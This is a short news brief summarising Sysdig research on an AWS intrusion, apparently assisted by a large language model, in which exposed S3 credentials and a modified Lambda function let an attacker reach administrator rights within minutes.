Attackers exploit LLMs to gain admin rights in AWS
Briefly

Attackers exploit LLMs to gain admin rights in AWS
"Security researchers at Sysdig warn that attackers can quickly take over AWS environments using large language models. Their latest analysis shows that AI is already being used to automate cloud attacks, accelerate them, and make them harder to detect. The Sysdig Threat Research Team bases these conclusions on an attack that began on November 28, 2025. In this case, an attacker gained initial access and escalated to full administrator rights within an AWS account in less than ten minutes."
"The attack began with login credentials left in publicly accessible S3 buckets. These buckets contained RAG data for AI models and were linked to an IAM user with sufficient Lambda permissions to be exploited. The attacker used those rights to modify the code of an existing Lambda function. The new code generated access keys for an admin user and returned them directly via the Lambda response."
An attacker gained initial access to an AWS account by finding login credentials left in publicly accessible S3 buckets that contained RAG data for AI models and were linked to an IAM user with Lambda permissions. The attacker modified an existing Lambda's code to generate admin access keys and return them in the Lambda response. The malicious code contains Serbian comment lines and extensive error handling, suggesting LLM involvement. The Lambda execution role had broad permissions, allowing indirect administrative privilege acquisition without classic IAM privilege escalation. The attacker moved laterally across nineteen AWS principals, created new access keys and an admin user for persistence, and attempted role assumptions in other accounts.
Read at Techzine Global
Unable to calculate read time
[
|
]